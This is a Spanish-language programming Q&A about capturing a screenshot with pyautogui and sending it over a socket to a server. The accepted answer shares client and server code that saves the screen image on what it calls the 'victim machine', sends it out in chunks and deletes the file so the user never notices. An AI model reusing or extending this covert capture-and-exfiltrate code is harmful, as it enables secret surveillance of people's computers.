# Convertir imagen a bytes en python

Tags: python, python-3.x, python-2.x

Me explico, mi programa es un cliente-servidor via socket. En donde tiene varias funciones. Una de ellas, por el lado del cliente es tomar una captura de pantalla y luego enviarselo al servidor. Para la captura en el lado del cliente estoy usando pyautogui. Pero realmente no consigo poder enviar el archivo ya que al usar with open me arroja este error en el cliente "expected str bytes or os.pathlike object not image". Creo que esto no sucede cuando ya se tiene la imagen en el escritorio pero no es mi deseo guardar la imagen en el pc del cliente para luego leerlo y enviarla y recibirlo en el servidor obviamnete como .PNG. entonces creo que una solucion seria "realizar la captura de pantalla y convertirla enseguida a binario o str pero realmente no se como hacerlo. Simplemente deseo que tome captura y envie enseguida sin guardar nada en el pc cliente. Recurro aqui porque ya he estado investigando bastante pero no doy con algo que pueda ayudarme.

Les dejo mi codigo del servidor y del cliente para que le hechen un ojo.

Servidor:

```
elif comandos == "captura":
                cliente.send(comandos.encode('cp1252'))
                recibo = cliente.recv(buffer)
                with open("img.png", 'wb') as f:
                    f.write(base64.b64decode(recibo))
```

Cliente:

```
elif data == "captura":
            toma_captura = pyautogui.screenshot("img.png")
            with open(toma_captura, 'rb') as f:
                toma_codi = base64.b64encode(f)
                servidor.send(toma_codi)
```

Comment: por ahora tu error se soluciona haciendo `servidor.send(toma.codi.encode())` o haciendo directamente `servidor.send(f.read())` En cuanto a no guardar la captura No sé muy bien como hacerlo, creo que pyautogui usaba `PIL` para el manejo de imágenes. Si tengo algo de tiempo investigo y proporciono una respuesta

Comment: gracias, pero realmente no ayudo.

Comment: No funciono lo que dije?

Comment: si y no. Pero lo resolvi con varios nuevos ajustes. Comparto este buen codigo con explicacion.

Answer (score 1, accepted):

Bueno encontre la solucion a mi codigo. Al final lo mejor fue, generar la captura y que se guarde en la maquina victima, luego el cliente envia la captura como .PNG al servidor y luego de eso hago un os.remove() para remover la imagen en el cliente. Lo bueno de esto es que es tan rapido el proceso que la imagen no se alcanza a ver en el pc del cliente. COMPARTO AMBOS CODIGOS MI WACHOS....

Un detalle.. al enviar la imagen queda guardada en el servidor como "1.PNG" por lo que si deseas realizar otra captura de pantalla no olvides primero cambiar el nombre de la primera captura y asi o el codigo generara un error..... y como dije en el cliente no sera problema por que se le hace un "REMOVE" a la captura.

Ahora si deseas codificar que genera cada captura con diferente nombre eso ya queda a tu disposicion.

SERVIDOR:

```
elif comandos == "captura":
                fmt = "<Q"
                cliente.send(comandos.encode('cp1252'))
                filesice = cliente.recv(buffer)
                files_sice = struct.unpack(fmt, filesice) [0]

                with open('1.png', 'wb') as f:
                    recibe_sice = 0

                    while recibe_sice < files_sice: 
                        chuken = cliente.recv(1024)
                        if chuken: 
                            f.write(chuken)
                            recibe_sice += len(chuken)
```

CLIENTE:

```
elif data == "captura":
            captura = pyautogui.screenshot("1.png")
            captura.save

            filesice = os.path.getsize("1.png")
            servidor.send(struct.pack("<Q", filesice))

            with open('1.png', 'rb') as f:
                while read_capture := f.read(1024):
                    servidor.sendall(read_capture)
                
            os.remove("1.png")
```